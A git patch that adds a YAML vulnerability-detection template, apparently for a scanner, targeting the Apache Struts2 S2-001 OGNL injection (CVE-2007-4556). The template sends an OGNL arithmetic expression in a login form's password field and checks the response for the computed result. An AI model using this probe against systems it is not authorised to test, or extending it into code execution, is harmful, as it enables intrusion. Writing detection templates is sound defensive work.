From d7ab8a24440e7cdd953fd40044cc0ddae1b288f4 Mon Sep 17 00:00:00 2001
From: PikPikcU <60111811+pikpikcu@users.noreply.github.com>
Date: Sun, 21 Feb 2021 13:57:34 +0000
Subject: [PATCH] add CVE-2007-4556

---
 cves/2007/CVE-2007-4556.yaml | 29 +++++++++++++++++++++++++++++
 1 file changed, 29 insertions(+)
 create mode 100644 cves/2007/CVE-2007-4556.yaml

diff --git a/cves/2007/CVE-2007-4556.yaml b/cves/2007/CVE-2007-4556.yaml
new file mode 100644
index 0000000000..effef1fcdb
--- /dev/null
+++ b/cves/2007/CVE-2007-4556.yaml
@@ -0,0 +1,29 @@
+id: CVE-2007-4556
+
+info:
+  name: Apache Struts2 S2-001 RCE
+  author: pikpikcu
+  severity: critical
+  reference: https://www.guildhab.top/?p=2326
+  tags: cve, cve2007,apache,rce
+
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/login.action"
+    headers:
+        Content-Type: application/x-www-form-urlencoded
+    body: |
+        username=test&password=%25%7B123456789*987654321%7D
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        words:
+          - "-67153019"
+        condition: and
+
+      - type: status
+        status:
+          - 200